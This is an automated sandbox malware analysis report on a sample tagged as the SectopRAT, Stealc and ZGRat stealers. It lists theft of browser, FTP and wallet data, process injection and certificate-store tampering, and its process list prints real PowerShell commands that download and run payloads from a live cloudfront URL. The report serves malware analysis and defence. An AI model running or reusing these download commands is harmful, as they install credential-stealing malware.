Malware Analysis Report

2024-12-08 01:39

Sample ID 240428-bq4dqsch49
Target 705685a8deace858e7fc849471c045f3.bin
SHA256 61808802cf5808232043a5659d064395a10953bffe31b4a2807055b59a945b0e
Tags
sectoprat stealc zgrat discovery rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

61808802cf5808232043a5659d064395a10953bffe31b4a2807055b59a945b0e

Threat Level: Known bad

The file 705685a8deace858e7fc849471c045f3.bin was found to be: Known bad.

Malicious Activity Summary

sectoprat stealc zgrat discovery rat spyware stealer trojan

SectopRAT payload

Detect ZGRat V1

ZGRat

Stealc

SectopRAT

Downloads MZ/PE file

Blocklisted process makes network request

Reads data files stored by FTP clients

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Checks processor information in registry

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-28 01:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:24

Platform

win7-20240221-en

Max time kernel

119s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2612 set thread context of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 328 set thread context of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ufw.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ufw.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ufw.3.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\ufw.0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\ufw.0.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2240 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 944 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 944 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 944 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 944 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 944 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.0.exe
PID 572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.0.exe
PID 572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.0.exe
PID 572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.0.exe
PID 944 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 2612 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 572 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.3.exe
PID 572 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.3.exe
PID 572 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.3.exe
PID 572 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.3.exe
PID 2612 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\ufw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1532 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\ufw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1532 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\ufw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1532 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\ufw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe

"C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsy7CBF.tmp\lood.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

